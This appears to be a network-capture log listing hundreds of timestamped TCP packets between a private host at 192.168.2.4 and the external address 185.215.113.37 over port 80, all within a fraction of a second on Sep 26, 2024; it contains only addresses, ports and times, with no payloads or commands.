Sep 26, 2024 18:27:06.210932016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210939884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210964918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.210983992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.210999012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.211007118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.211044073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.211344004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.211404085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.211450100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.211483002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.211496115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.211532116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.211533070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.211568117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.211581945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.211601019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.211611986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.211636066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.211647034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.211672068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.211683989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.211704969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.211714983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.211738110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.211754084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.211771011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.211781025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.211803913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.211816072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.211837053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.211850882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.211872101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.211882114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.211910009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.212836027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.212865114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.212896109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.212915897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.212924004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.212939978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.212945938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.212980032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213000059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213016033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213020086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213059902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213067055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213100910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213110924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213131905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213145018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213165045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213182926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213196993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213227987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213246107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213277102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213279009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213298082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213310957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213320971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213342905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213354111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213376999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213390112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213407040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213418007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213439941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213453054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213471889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213481903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213509083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213516951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213541985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213552952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213577032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213603973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213608980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213623047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213643074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213649988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213675022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213685036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213709116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213716984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213742018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213754892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213773012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213782072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213802099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213813066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213835001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213844061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213869095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213880062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213901997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213912010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213934898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213952065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.213969946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.213983059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.214004993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.214021921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.214032888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.214037895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.214047909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.214071989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.214085102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.214104891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.214114904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.214138031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.214148998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.214169979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.214179039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.214202881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.214210987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.214236021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.214248896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.214268923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.214277983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.214303017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.214313984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.214344025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.245697975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.245754004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.245774031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.245784044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.245801926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.245834112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.245837927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.245867014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.245883942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.245899916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.245927095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.245934010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.245950937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.245970011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.245980978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246027946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246042967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246100903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246129990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246184111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246217966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246280909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246289015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246341944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246357918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246406078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246418953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246438980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246450901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246480942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246488094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246526003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246540070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246553898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246577978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246598005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246604919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246638060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246654987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246671915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246695042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246707916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246718884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246754885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246758938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246808052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246812105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246840000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246856928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246876001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246886015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246906996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246928930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246942043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246953011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.246974945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.246994972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.247008085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.247018099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.247040033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.247071028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.247072935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.247097015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.247114897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.262336969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.262389898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.262422085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.262435913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.262464046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.262464046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.262473106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.262505054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.262521982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.262537956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.262545109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.262571096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.262599945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.262603998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.262623072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.262646914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.298824072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.298868895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.298883915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.298921108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.298935890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.298949957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.298966885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.298983097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.298990965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.298990965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299052000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299154043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299170017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299184084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299197912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299201965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299218893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299232006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299237013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299268961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299295902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299400091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299422026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299437046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299443007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299452066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299464941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299469948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299485922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299493074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299493074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299501896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299518108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299531937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299535990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299536943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299545050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299556017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299562931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299581051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299592972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299612999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299638987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299791098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299877882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299894094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299909115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299923897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299937963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.299961090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299962044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299962044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299962044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.299962044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300017118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300043106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300056934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300067902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300067902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300070047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300087929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300100088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300103903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300100088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300120115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300144911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300144911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300144911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300214052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300216913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300257921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300360918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300375938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300390005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300401926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300422907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300422907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300422907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300437927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300452948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300466061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300467014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300466061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300484896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300498009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300529003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300759077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300775051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300787926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300810099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300825119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300839901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300851107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300851107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300853014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300851107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300868034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300884962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300896883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300898075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300915003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300928116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300930023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300928116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300946951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.300961018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.300988913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301024914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301263094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301280022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301294088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301317930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301328897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301328897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301332951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301348925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301363945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301379919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301394939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301397085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301397085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301398039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301398039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301409960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301426888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301441908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301443100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301444054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301444054 CEST	49730	80	192.168.2.4	185.215.113.37
